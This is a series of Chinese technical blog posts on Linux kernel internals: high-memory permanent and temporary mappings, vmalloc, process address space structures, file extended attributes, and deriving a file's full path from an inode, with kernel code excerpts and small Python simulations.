<p>为了使内核访问到高于896M的物理内存,必须将高端内存的页框映射到内核地址空间,Linux使用永久内核映射、临时内核映射以及非连续内存分配。</p>
<h4>永久内核映射</h4>
<p>永久内核映射允许内核建立高端页框到内核地址空间的长期映射,它们使用主内核页表中一个专门的页表,其地址存放在pkmap_page_table变量中。页表中的表项数由LAST_PKMAP宏产生。页表包含512或1024项,这取决于PAE机制是否被激活。因此,内核最多一次性访问2M或4M的高端内存。页表映射的线性地址从PKMAP_BASE开始,pkmap_count数组包含LAST_PKMAP个计数器,pkmap_page_table页表中的每一个项都有一个。计数器可能为0、1或大于1。</p>
<ul>
<li>
<p>如果计数器为0,则说明对应的页表项没有映射任何高端内存,所以是可用的。</p>
</li>
<li>
<p>如果计数器为1,则说明对应的页表项没有映射任何高端内存,但是不能被使用,因为自从它最后一次使用以来,其TLB表项还未被刷新。</p>
</li>
<li>
<p>如果计数器为n(n大于1),则说明映射了一个高端内存页框,这意味着正好有n-1个内核成分在使用这个页框。</p>
</li>
</ul>
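pkmap_count 三种取值的语义可以用一小段Python模拟(槽位数缩小到4便于演示,flush_all_zero_pkmaps对应内核中刷新TLB并回收计数为1的槽位的操作,逻辑为简化示意):

```python
LAST_PKMAP = 4                   # 真实内核中为512或1024项,这里缩小便于演示

pkmap_count = [0] * LAST_PKMAP   # 0:空闲 1:已解除映射但TLB未刷新 n>1:有n-1个使用者
pkmap_page  = [None] * LAST_PKMAP

def flush_all_zero_pkmaps():
    """模拟刷新TLB:把计数为1的槽位真正回收为可用。"""
    for i in range(LAST_PKMAP):
        if pkmap_count[i] == 1:
            pkmap_count[i] = 0
            pkmap_page[i] = None

def kmap_sim(pfn):
    """返回页框pfn被映射到的槽位下标(相当于一个内核线性地址)。"""
    for i in range(LAST_PKMAP):            # 已经映射:只增加引用计数
        if pkmap_page[i] == pfn and pkmap_count[i] > 1:
            pkmap_count[i] += 1
            return i
    for i in range(LAST_PKMAP):            # 找一个计数为0的空闲槽位
        if pkmap_count[i] == 0:
            pkmap_page[i] = pfn
            pkmap_count[i] = 2             # 1个占位 + 1个使用者
            return i
    flush_all_zero_pkmaps()                # 没有空闲槽位:先刷新再重试
    return kmap_sim(pfn)                   # 真实内核在仍无槽位时会睡眠等待

def kunmap_sim(i):
    pkmap_count[i] -= 1                    # 减到1:解除映射,但TLB还未刷新
```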
<p>为了记录高端内存页框与永久内核映射包含的线性地址之间的联系,内核使用page_address_htable散列表,表中的每一项是一个page_address_map数据结构,用于描述高端内存中一个页框的映射。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct page_address_map {
struct page *page;
void *virtual;
struct list_head list;
};
</code></pre></div></div>
<p>page_address()函数返回页框对应的线性地址,如果页框在高端内存中并且没有被映射,则返回NULL。如果页框不在高端内存中,就通过lowmem_page_address返回线性地址。如果在高端内存中,则通过函数page_slot在page_address_htable中查找,如果在散列表中查找到,就返回线性地址。</p>
<p>kmap()用来建立内存区映射,代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap(struct page *page){
might_sleep();
if (!PageHighMem(page))
return page_address(page);
return kmap_high(page);
};
</code></pre></div></div>
<p>本质上,如果页框属于高端内存区域,则调用kmap_high()函数建立高端内存区的永久内核映射,代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap_high(struct page *page)
{
unsigned long vaddr;
/*
* For highmem pages, we can't trust "virtual" until
* after we have the lock.
*/
lock_kmap();
vaddr = (unsigned long)page_address(page);
if (!vaddr)
vaddr = map_new_virtual(page);
pkmap_count[PKMAP_NR(vaddr)]++;
BUG_ON(pkmap_count[PKMAP_NR(vaddr)] < 2);
unlock_kmap();
return (void*) vaddr;
};
</code></pre></div></div>
<h4>临时内存映射</h4>
<p>说到临时内存映射就要说到固定映射的线性地址,就是第一张图的最后一部分。固定映射的线性地址(fix-mapped linear address)基本上是一种类似于0xffffc000这样的常量线性地址,其对应的物理地址不必等于线性地址减去0xc0000000,而是可以以任意方式建立。因此,每个固定映射的线性地址都映射一个物理内存的页框。</p>
<p>高端内存的任意一页框都可以通过一个“窗口”(为此而保留的一个页表项)映射到内核地址空间。每个CPU都有它自己的一个窗口集合,用enum km_type数据结构表示(窗口个数随内核版本而变,ULK描述的2.6早期内核中为13个)。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>enum km_type {
KMAP_D(0) KM_BOUNCE_READ,
KMAP_D(1) KM_SKB_SUNRPC_DATA,
KMAP_D(2) KM_SKB_DATA_SOFTIRQ,
KMAP_D(3) KM_USER0,
KMAP_D(4) KM_USER1,
KMAP_D(5) KM_BIO_SRC_IRQ,
KMAP_D(6) KM_BIO_DST_IRQ,
KMAP_D(7) KM_PTE0,
KMAP_D(8) KM_PTE1,
KMAP_D(9) KM_IRQ0,
KMAP_D(10) KM_IRQ1,
KMAP_D(11) KM_SOFTIRQ0,
KMAP_D(12) KM_SOFTIRQ1,
KMAP_D(13) KM_SYNC_ICACHE,
KMAP_D(14) KM_SYNC_DCACHE,
KMAP_D(15) KM_UML_USERCOPY,
KMAP_D(16) KM_IRQ_PTE,
KMAP_D(17) KM_NMI,
KMAP_D(18) KM_NMI_PTE,
KMAP_D(19) KM_TYPE_NR
};
</code></pre></div></div>
<p>km_type中的每个符号(除了最后一个)都是固定映射的线性地址的一个下标。为了建立临时内核映射,内核调用kmap_atomic()函数。在后来的内核代码中,kmap_atomic()函数只是使用了kmap_atomic_prot。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *kmap_atomic_prot(struct page *page, enum km_type type)
{
unsigned int idx;
unsigned long vaddr;
void *kmap;
pagefault_disable();
if (!PageHighMem(page))
return page_address(page);
debug_kmap_atomic(type);
kmap = kmap_high_get(page);
if (kmap)
return kmap;
idx = type + KM_TYPE_NR * smp_processor_id();
vaddr = __fix_to_virt(FIX_KMAP_BEGIN + idx);
#ifdef CONFIG_DEBUG_HIGHMEM
BUG_ON(!pte_none(*(TOP_PTE(vaddr))));
#endif
set_pte_ext(TOP_PTE(vaddr), mk_pte(page, kmap_prot), 0);
local_flush_tlb_kernel_page(vaddr);
return (void *)vaddr;
}
</code></pre></div></div>
<h4>非连续内存分配</h4>
<p>如果内核能够找到连续的页,那是最好的,这样分配和释放都会比较简单,但是真实的系统里情况往往不是那么简单。在分配一大块内存时,可能竭尽全力也无法找到连续的内存块,在用户空间中这不是问题,因为普通进程设计为使用处理器的分页机制,当然这也会降低速度并占用TLB。</p>
<p>为非连续内存区保留的线性地址空间从VMALLOC_START到VMALLOC_END。</p>
<p>每个vmalloc分配的子区域都是自包含的,与其他vmalloc子区域通过一个内存页分隔,类似于直接映射和vmalloc区域之间的边界,不同vmalloc子区域之间的分隔也是为防止不正确的内存访问操作。这种情况只会因为内核故障出现,应该通过系统错误信息报告,而不是允许内核其他部分的数据被暗中修改,因为分隔是在虚拟地址空间中建立的,不会浪费物理内存页。</p>
<p>vmalloc是一个接口函数,内核代码使用它来分配在虚拟内存中连续但在物理内存中不一定连续的内存。
这个函数只需要一个参数,用于指定所需内存区的长度,不过其长度单位不是页而是字节,这在用户空间程序的设计中是很普遍的。</p>
<p>使用vmalloc的最著名的实例是内核对模块的实现,因为模块可以在任何时候加载,如果模块数据比较多,那么无法保证有足够的连续内存可用,特别是在系统已经运行了比较长时间的情况下。如果能够用小块内存拼接出足够的内存,那么就可以使用vmalloc。</p>
<p>因为用于vmalloc的内存页总是必须映射在内核地址空间中,因此使用ZONE_HIGHMEM内存域的页要优于其他内存域,这使得内核可以节省更宝贵的低端内存域,又不会带来额外的坏处。所以,vmalloc是内核出于自身的目的使用高端内存页的少数情况之一。</p>
<p>内核在管理虚拟内存中的vmalloc区域时,必须跟踪哪些子区域被使用,哪些是空闲的,所以定义了一个vm_struct的数据结构,并将所有使用的部分保存在一个链表中。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct vm_struct {
struct vm_struct *next;
void *addr;
unsigned long size;
unsigned long flags;
struct page **pages;
unsigned int nr_pages;
unsigned long phys_addr;
void *caller;
};
</code></pre></div></div>
<p>内核通过vmalloc()来申请非连续的物理内存,若申请成功,该函数返回连续内存区的起始地址,否则,返回NULL。vmalloc()和kmalloc()申请的内存有所不同,kmalloc()所申请内存的线性地址与物理地址都是连续的,而vmalloc()所申请的内存线性地址连续而物理地址则是离散的,两个地址之间通过内核页表进行映射。</p>
<p>vmalloc()的工作方式理解起来很简单:</p>
<ol>
<li>寻找一个新的连续线性地址空间;</li>
<li>依次分配一组非连续的页框;</li>
<li>为线性地址空间和非连续页框建立映射关系,即修改内核页表。</li>
</ol>
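上面三步可以用Python粗略模拟:线性地址连续、页框物理上离散、各区域之间留一个隔离页(VMALLOC_START等取值只是假设,仅为示意):

```python
PAGE_SIZE = 0x1000
VMALLOC_START = 0xF8000000      # 假设的vmalloc区起点,仅为示意

next_area = VMALLOC_START       # 下一段可用的连续线性地址
page_table = {}                 # 模拟内核页表: 线性地址 -> 页框号

def vmalloc_sim(nr_pages, alloc_page):
    global next_area
    vstart = next_area                          # 1. 找一段新的连续线性地址
    next_area += (nr_pages + 1) * PAGE_SIZE     #    多留1页作为区域间的隔离页
    for i in range(nr_pages):
        pfn = alloc_page()                      # 2. 页框物理上不必连续
        page_table[vstart + i * PAGE_SIZE] = pfn  # 3. 修改"页表"建立映射
    return vstart
```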
Linux进程地址空间简介2014-10-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/10/linux-process-vm
<h3>一. 进程的地址空间</h3>
<p>32位系统下,每一个进程可以使用的虚拟地址空间为4G,这4G包括了进程独有的部分和内核部分,windows下进程占2G,内核占2G,Linux下默认是3G和1G。虽然有4G的地址空间,当然不可能全部用到,所以实际上只有很少一部分分配了实际内存。进程的地址空间由允许进程使用的全部线性地址组成。</p>
<p>内核通过所谓线性区的资源来表示线性地址空间,线性区是由起始线性地址、长度和一些访问权限来描述的。为了效率起见,起始地址和线性区长度都必须是4096的倍数,以便每个线性区所识别的数据完全填满分配给它的页框。内核可以通过增加或删除某些线性地址区间来动态修改进程的地址空间。</p>
<h3>二. 内存描述符</h3>
<p>与进程地址空间有关的全部信息都包含在一个叫做内存描述符的数据结构中,这个结构的类型为mm_struct,进程描述符的mm字段就指向这个结构。mm_struct定义如下。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct mm_struct {
struct vm_area_struct * mmap; /* list of VMAs */
struct rb_root mm_rb;
struct vm_area_struct * mmap_cache; /* last find_vma result */
unsigned long free_area_cache; /* first hole */
pgd_t * pgd;
atomic_t mm_users; /* How many users with user space? */
atomic_t mm_count; /* How many references to "struct mm_struct" (users count as 1) */
int map_count; /* number of VMAs */
struct rw_semaphore mmap_sem;
spinlock_t page_table_lock; /* Protects task page tables and mm->rss */
struct list_head mmlist; /* List of all active mm's. These are globally strung
* together off init_mm.mmlist, and are protected
* by mmlist_lock
*/
unsigned long start_code, end_code, start_data, end_data;
unsigned long start_brk, brk, start_stack;
unsigned long arg_start, arg_end, env_start, env_end;
unsigned long rss, total_vm, locked_vm;
unsigned long def_flags;
unsigned long saved_auxv[40]; /* for /proc/PID/auxv */
unsigned dumpable:1;
cpumask_t cpu_vm_mask;
/* Architecture-specific MM context */
mm_context_t context;
/* coredumping support */
int core_waiters;
struct completion *core_startup_done, core_done;
/* aio bits */
rwlock_t ioctx_list_lock;
struct kioctx *ioctx_list;
struct kioctx default_kioctx;
};
</code></pre></div></div>
<p>下面介绍一些比较重要的字段。</p>
<ul>
<li>mmap 指向线性区对象的链表头,具体下一部分介绍。</li>
<li>mm_rb 指向线性区对象的红-黑树的根。mmap 和 mm_rb 这两个数据结构描述的对象是相同的:该地址空间中的所有内存区域。mmap 指向一个 vm_area_struct 结构的链表,利于简单、高效地遍历所有元素;mm_rb 指向的是一棵红-黑树,适合搜索指定元素。</li>
<li>pgd 指向第一级页表即页全局目录的基址,当内核运行这个进程时,就将pgd存放在CR3寄存器内,根据它来进行地址转换工作。</li>
<li>mmlist 将所有的内存描述符存放在一个双向链表中,第一个元素是init_mm的mmlist字段。</li>
<li>mm_users 存放共享mm_struct数据结构的轻量级进程的个数。</li>
<li>mm_count 是内存描述符的主使用计数器,mm_users使用计数器中的所有用户在mm_count中只作为一个单元。每当mm_count递减时,内核都要检查它是否变为0,如果是,就要解除分配这个内存描述符,因为不再有用户使用它。</li>
</ul>
<p>mm_count 代表了对 mm 本身的引用,而 mm_users 代表对 mm 相关资源的引用,分了两个层次。mm_count类似于以进程为单位,mm_users类似于以线程为单位。内核线程在运行时会借用其他进程的mm_struct,这样的线程叫”anonymous users”,因为他们不关心mm_struct指向的用户空间,也不会去访问这个用户空间,他们只是临时借用,mm_count记录这样的线程。mm_users是对mm_struct所指向的用户空间进行共享的所有进程的计数,也就是说会有多个进程共享同一个用户空间。</p>
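这段两级计数的关系可以用一小段Python模拟(方法名借用内核中mmget/mmgrab/mmput/mmdrop的叫法,逻辑是简化示意):

```python
class MM:
    """模拟 mm_users / mm_count 的两级引用计数。"""
    def __init__(self):
        self.mm_users = 1   # 共享该用户地址空间的(轻量级)进程数
        self.mm_count = 1   # 对 mm_struct 本身的引用,所有 users 合计算 1
        self.freed = False

    def mmget(self):        # 又一个线程共享用户地址空间
        self.mm_users += 1

    def mmgrab(self):       # 内核线程临时借用("anonymous user")
        self.mm_count += 1

    def mmput(self):
        self.mm_users -= 1
        if self.mm_users == 0:
            # 最后一个用户退出:释放用户空间资源,并放掉合计的那1次mm_count
            self.mmdrop()

    def mmdrop(self):
        self.mm_count -= 1
        if self.mm_count == 0:
            self.freed = True   # 此时才真正释放 mm_struct
```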
<h3>三. 线性区</h3>
<p>Linux通过类型为vm_area_struct的对象对线性区进行管理,其定义如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct vm_area_struct {
struct mm_struct * vm_mm; /* The address space we belong to. */
unsigned long vm_start; /* Our start address within vm_mm. */
unsigned long vm_end; /* The first byte after our end address within vm_mm. */
/* linked list of VM areas per task, sorted by address */
struct vm_area_struct *vm_next;
pgprot_t vm_page_prot; /* Access permissions of this VMA. */
unsigned long vm_flags; /* Flags, listed below. */
struct rb_node vm_rb;
union {
struct {
struct list_head list;
void *parent; /* aligns with prio_tree_node parent */
struct vm_area_struct *head;
} vm_set;
struct raw_prio_tree_node prio_tree_node;
} shared;
struct list_head anon_vma_node; /* Serialized by anon_vma->lock */
struct anon_vma *anon_vma; /* Serialized by page_table_lock */
/* Function pointers to deal with this struct. */
struct vm_operations_struct * vm_ops;
/* Information about our backing store: */
unsigned long vm_pgoff; /* Offset (within vm_file) in PAGE_SIZE
units, *not* PAGE_CACHE_SIZE */
struct file * vm_file; /* File we map to (can be NULL). */
void * vm_private_data; /* was vm_pte (shared mem) */
unsigned long vm_truncate_count;/* truncate_count or restart_addr */
};
</code></pre></div></div>
<p>每一个线性区描述符表示一个线性地址区间。vm_start字段包含区间的第一个线性地址,vm_end字段包含区间之外的第一个线性地址。vm_end-vm_start表示线性区的长度。vm_mm字段指向拥有这个区间的进程的mm_struct内存描述符。</p>
<p>进程所拥有的线性区从来不重叠,并且内核尽力把新分配的线性区与紧邻的现有线性区进行合并。如果两个相邻区的访问权限相匹配,就能把它们合并在一起。如下图所示,当一个新的线性地址加入到进程的地址空间时,内核检查一个已经存在的线性区是否可以扩大(情况a)。如果不能,就创建一个新的线性区(情况b)。类似地,如果从进程地址空间删除一个线性地址空间,内核就要调整受影响的线性区大小(情况c)。有些情况下,调整大小迫使一个线性区被分成两个更小的部分(情况d)。</p>
<p><img src="/assets/img/process_vm/1.jpg" alt="" /></p>
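图中情况a(扩大现有线性区)和情况b(新建线性区)的判断逻辑可以用Python示意:新线性区与现有线性区相邻且访问权限相同时合并,否则新建(仅为简化示意,真实内核中还要同步维护红-黑树等结构):

```python
def add_vma(vmas, start, end, prot):
    """vmas: 按地址排序、互不重叠的 (start, end, prot) 列表。
    模拟向进程地址空间加入新线性区时的合并逻辑。"""
    vmas.append((start, end, prot))
    vmas.sort()
    merged = [vmas[0]]
    for s, e, p in vmas[1:]:
        ls, le, lp = merged[-1]
        if s == le and p == lp:       # 相邻且权限相同 -> 扩大现有线性区
            merged[-1] = (ls, e, p)
        else:                         # 否则新建一个线性区
            merged.append((s, e, p))
    return merged
```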
<p>进程所拥有的所有线性区是通过一个简单的链表链接在一起的。出现在链表中的线性区是按内存地址的升序排列的;不过,每个线性区可以由未使用的内存地址区隔开。每个vm_area_struct元素的vm_next字段指向链表的下一个元素。内核通过检查描述符mmap字段来查找线性区,其中mmap字符指向链表中的第一个线性区描述符。下图显示了进程的地址空间、它的内存描述符以及线性区链表三者之间的关系。</p>
<p><img src="/assets/img/process_vm/2.PNG" alt="" /></p>
<p>为了提高访问线性区的性能,Linux也使用了红-黑树。这两种数据结构包含指向同一线性区描述符的指针,当插入或删除一个线性区描述符时,内核通过红-黑树搜索前后元素,并用搜索结果快速更新链表而不用扫描链表。一般来说,红-黑树用来确定含有指定地址的线性区,而链表通常在扫描整个线性区集合时来使用。</p>
<p>下面随便看看一个进程的线性区。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct task_struct *t = pid_task(find_get_pid(2576),PIDTYPE_PID);
struct mm_struct * mm = t->mm;
struct vm_area_struct* vma = mm->mmap;
int i;
for(i = 0;i < mm->map_count;++i)
{
printk("0x%lx-----0x%lx\n",vma->vm_start,vma->vm_end);
vma = vma->vm_next;
}
</code></pre></div></div>
<p>通过dmesg看结果如下图。</p>
<p><img src="/assets/img/process_vm/4.PNG" alt="" /></p>
<p>这与通过cat /proc/2576/maps命令看到的结果是一致的,只有栈部分有少许差别。</p>
<p><img src="/assets/img/process_vm/3.PNG" alt="" /></p>
Linux文件扩展属性以及从内核中获得文件扩展属性2014-10-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/10/09/linux-extend-attr
<p>扩展属性(EA)就是以名称-值对形式将任意元数据与文件i节点关联起来的技术。EA可以用于实现访问列表和文件能力,还可以利用EA去记录文件的版本号、与文件的MIME类型/字符集有关的信息等,反正想干嘛就干嘛吧。</p>
<p>EA的命名格式为namespace.name。其中namespace用来把EA从功能上划分为截然不同的几大类,而name则用来在既定命名空间内唯一标示某个EA。</p>
<p>Linux定义了4种namespace:user、trusted、system和security。</p>
<ul>
<li>user EA:在文件权限检查的制约下由非特权级进程操控。</li>
<li>trusted EA:也可由用户进程“驱使”,与user EA相似。区别在于,要操纵trusted EA,进程必须具有特权(CAP_SYS_ADMIN)。</li>
<li>system EA:供内核使用,将系统对象与一文件关联。目前仅支持访问控制列表。</li>
<li>
<p>security EA:作用有二:其一,用来存储服务于操作系统安全模块的文件安全标签;其二,将可执行文件与能力关联起来。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm@ubuntu:~$ touch filetest
kvm@ubuntu:~$ setfattr -n user.x -v "The past is not dead." filetest
kvm@ubuntu:~$ setfattr -n user.y -v "In fact,it's not even past." filetest
kvm@ubuntu:~$ getfattr -n user.x filetest
# file: filetest
user.x="The past is not dead."
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x="The past is not dead."
user.y="In fact,it's not even past."
kvm@ubuntu:~$ setfattr -n user.x filetest //设置EA的值为一个空字符串
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x
user.y="In fact,it's not even past."
kvm@ubuntu:~$ setfattr -x user.y filetest //删除一个EA
kvm@ubuntu:~$ getfattr -d filetest
# file: filetest
user.x
</code></pre></div> </div>
</li>
</ul>
<p>应用层的函数就不说了,下面简单介绍一下在内核层中获取文件的EA。一小段测试代码如下,主要是通过inode结构中操作getxattr来得到,当然之前需要得到dentry。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int hello_init(void)
{
    struct file *f;
    struct inode *node;
    struct dentry *dent;
    int rc;
    char in[100];
    printk(KERN_ALERT "Hello, world\n");
    printk(KERN_ALERT "name:%s\n", current->comm);
    f = filp_open("/home/kvm/tfile", O_RDONLY, 0);
    if (IS_ERR(f))                 /* 打开失败时不能继续解引用 */
        return 0;
    dent = f->f_path.dentry;
    node = dent->d_inode;
    if (node->i_op->getxattr == NULL)
    {
        printk("inode's getxattr is null!\n");
        filp_close(f, NULL);
        return 0;
    }
    /* getxattr返回的内容不带结尾的'\0',留一个字节手动补上 */
    rc = node->i_op->getxattr(dent, "user.x", in, sizeof(in) - 1);
    filp_close(f, NULL);
    if (rc < 0)
        return 0;
    in[rc] = '\0';
    printk("the user.x is:%s\n", in);
    return 0;
}
</code></pre></div></div>
<p>输出为:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>the user.x is:The past is not dead.
</code></pre></div></div>
Linux内核中从inode结构得到文件路径名2014-08-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/08/31/get-the-full-pathname-from-inode
<p>最近的一个需求,从文件的inode得到全路径名。顺便总结一下Linux系统中的file,path,dentry,inode结构。</p>
<ul>
<li><a href="#第一节">概述</a></li>
<li><a href="#第二节">各个结构</a></li>
<li><a href="#第三节">从inode得到文件绝对路径</a></li>
</ul>
<h3 id="第一节">1.概述</h3>
<p>构成一个操作系统最重要的部分就是进程管理和文件系统了。</p>
<p>Linux最初采用的是minix的文件系统,minix是由Andrew S. Tanenbaum开发的用于实验教学的操作系统,带有一些局限性。后来经过一段时间的改进和发展,Linux开发出了ext2文件系统,之后又逐渐发展出了ext3、ext4。为了使Linux支持各种不同的文件系统,Linux使用了所谓的虚拟文件系统VFS(Virtual Filesystem Switch),VFS提供一组标准的、抽象的文件操作,以系统调用的形式提供给用户程序,如read(),write(),lseek()等。这样,用户程序就可以把所有的文件都看作一致的、抽象的”VFS文件”,通过这些系统调用对文件进行操作,而无需关心具体的文件属于什么文件系统以及具体文件系统的设计和实现。VFS与具体文件系统的关系如图1所示。</p>
<p><img src="/assets/img/inode/1.PNG" alt="" /></p>
<h3 id="第二节">2.各个结构</h3>
<p>不同的文件系统通过不同的程序来实现其各种功能,但是与VFS之间的界面则是有明确的定义。这个界面的主体就是file_operations数据结构。定义在include/linux/fs.h中:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct file_operations {
struct module *owner;
loff_t (*llseek) (struct file *, loff_t, int);
ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
int (*readdir) (struct file *, void *, filldir_t);
unsigned int (*poll) (struct file *, struct poll_table_struct *);
long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
int (*mmap) (struct file *, struct vm_area_struct *);
int (*open) (struct inode *, struct file *);
int (*flush) (struct file *, fl_owner_t id);
int (*release) (struct inode *, struct file *);
int (*fsync) (struct file *, loff_t, loff_t, int datasync);
int (*aio_fsync) (struct kiocb *, int datasync);
int (*fasync) (int, struct file *, int);
int (*lock) (struct file *, int, struct file_lock *);
ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
int (*check_flags)(int);
int (*flock) (struct file *, int, struct file_lock *);
ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
int (*setlease)(struct file *, long, struct file_lock **);
long (*fallocate)(struct file *file, int mode, loff_t offset,
loff_t len);
};
</code></pre></div></div>
<p>每个文件系统都有自己的file_operations结构,结构中的成分几乎全是函数指针,所以实际上是个函数跳转表,例如read就指向具体文件系统用来实现读文件操作的入口函数。</p>
<p>每个进程通过open()与具体的文件建立起连接,这种连接以一个file数据结构作为代表,结构中有个file_operations结构指针f_op。将file结构中的指针f_op设置成指向某个具体的file_operations结构,就指定了这个文件所属的文件系统。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct files_struct {
/*
* read mostly part
*/
atomic_t count;
struct fdtable __rcu *fdt;
struct fdtable fdtab;
/*
* written part on a separate cache line in SMP
*/
spinlock_t file_lock ____cacheline_aligned_in_smp;
int next_fd;
struct embedded_fd_set close_on_exec_init;
struct embedded_fd_set open_fds_init;
struct file __rcu * fd_array[NR_OPEN_DEFAULT];
};
</code></pre></div></div>
<p>进程的task_struct中有一个类型为struct files_struct的files域,记录了已打开文件的信息。files_struct的主体就是一个file结构数组。每打开一个文件以后,进程就通过一个“打开文件号”fd来访问这个文件,而fd实际上就是相应file结构在数组中的下标。file结构中还有一个指针f_dentry,指向该文件的dentry数据结构。每一个文件只有一个dentry结构,而可能有多个进程打开它。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct dentry {
/* RCU lookup touched fields */
unsigned int d_flags; /* protected by d_lock */
seqcount_t d_seq; /* per dentry seqlock */
struct hlist_bl_node d_hash; /* lookup hash list */
struct dentry *d_parent; /* parent directory */
struct qstr d_name;
struct inode *d_inode; /* Where the name belongs to - NULL is
* negative */
unsigned char d_iname[DNAME_INLINE_LEN]; /* small names */
/* Ref lookup also touches following */
unsigned int d_count; /* protected by d_lock */
spinlock_t d_lock; /* per dentry lock */
const struct dentry_operations *d_op;
struct super_block *d_sb; /* The root of the dentry tree */
unsigned long d_time; /* used by d_revalidate */
void *d_fsdata; /* fs-specific data */
struct list_head d_lru; /* LRU list */
/*
* d_child and d_rcu can share memory
*/
union {
struct list_head d_child; /* child of parent list */
struct rcu_head d_rcu;
} d_u;
struct list_head d_subdirs; /* our children */
struct list_head d_alias; /* inode alias list */
};
</code></pre></div></div>
<p>dentry结构中有一个指向inode的指针。dentry与inode结构所描述的目标是不一样的,因为一个文件可能对应多个文件名(链接)。所以dentry结构代表的是逻辑意义上的文件,记录的是其逻辑上的属性。而inode结构所代表的是物理意义上的文件,记录的是其物理上的属性;它们之间的关系是多对一的关系。这是因为一个已经建立的文件可以被连接 (link) 到其他文件名。dentry中还有个d_parent指向父目录的dentry结构。</p>
<p>inode数据结构比较大,就不列出来了。要注意的是inode结构中有一个i_dentry是所有与这个inode关联的dentry。凡是代表着这个文件的所有目录项都通过其dentry结构中的d_alias挂入相应inode结构中的 i_dentry 队列。</p>
<p>下面是需要注意的几点:</p>
<ol>
<li>进程每打开一个文件,就会有一个file结构与之对应。同一个进程可以多次打开同一个文件而得到多个不同的file结构,file结构描述被打开文件的属性,如文件的当前偏移量等信息。</li>
<li>两个不同的file结构可以对应同一个dentry结构。进程多次打开同一个文件时,对应的只有一个dentry结构。dentry结构存储目录项和对应文件(inode)的信息。</li>
<li>在存储介质中,每个文件对应唯一的inode结点,但是每个文件又可以有多个文件名。即可以通过不同的文件名访问同一个文件。这里多个文件名对应一个文件的关系在数据结构中表示就是dentry和inode的关系。</li>
<li>inode中不存储文件的名字,它只存储节点号;而dentry则保存有名字和与其对应的节点号,所以就可以通过不同的dentry访问同一个inode。</li>
<li>不同的dentry则是同个文件链接(ln命令)来实现的。</li>
</ol>
<p>因此关系就是:进程->task_struct->files_struct->file->dentry->inode->Data Area</p>
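上面第3、4、5点在用户态就能直观验证:对同一个文件建立硬链接后,两个文件名(两个dentry)对应的是同一个inode。下面是一小段Python演示(需要在支持硬链接的Linux文件系统上运行):

```python
import os
import tempfile

def hardlink_demo():
    # 创建文件a.txt,再为它建立硬链接b.txt(相当于 ln a.txt b.txt)
    with tempfile.TemporaryDirectory() as d:
        a = os.path.join(d, "a.txt")
        b = os.path.join(d, "b.txt")
        with open(a, "w") as f:
            f.write("hello")
        os.link(a, b)
        sa, sb = os.stat(a), os.stat(b)
        # 两个目录项指向同一个inode,inode的链接计数为2
        return sa.st_ino == sb.st_ino, sa.st_nlink
```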
<h3 id="第三节">3.从inode得到文件绝对路径</h3>
<p>有了上面的基础,从inode得到文件名就比较简单了,这里我假设文件只有一个路径,如果有很多路径改改就行了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>char *getfullpath(struct inode *inod,char* buffer,int len)
{
struct list_head* plist = NULL;
struct dentry* tmp = NULL;
struct dentry* dent = NULL;
struct dentry* parent = NULL;
char* name = NULL;
char* pbuf = buffer + PATH_MAX - 1;
struct inode* pinode = inod;
int length = 0;
buffer[PATH_MAX - 1] = '\0';
if(pinode == NULL)
return NULL;
list_for_each(plist,&pinode->i_dentry)
{
tmp = list_entry(plist,struct dentry,d_alias);
if(tmp->d_inode == pinode)
{
dent = tmp;
break;
}
}
if(dent == NULL)
{
return NULL;
}
name = (char*)(dent->d_name.name);
name = name + strlen(name) - 4;
if(!strcmp(name,".img"))
{
while(pinode && pinode ->i_ino != 2 && pinode->i_ino != 1)
{
if(dent == NULL)
break;
name = (char*)(dent->d_name.name);
if(!name)
break;
pbuf = pbuf - strlen(name) - 1;
*pbuf = '/';
memcpy(pbuf+1,name,strlen(name));
length += strlen(name) + 1;
if((parent = dent->d_parent))
{
dent = parent;
pinode = dent->d_inode;
}
}
printk(KERN_INFO "the fullname is :%s \n",pbuf);
}
return pbuf;
}
</code></pre></div></div>
我们最幸福2014-08-10T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/08/10/nothing-to-envy
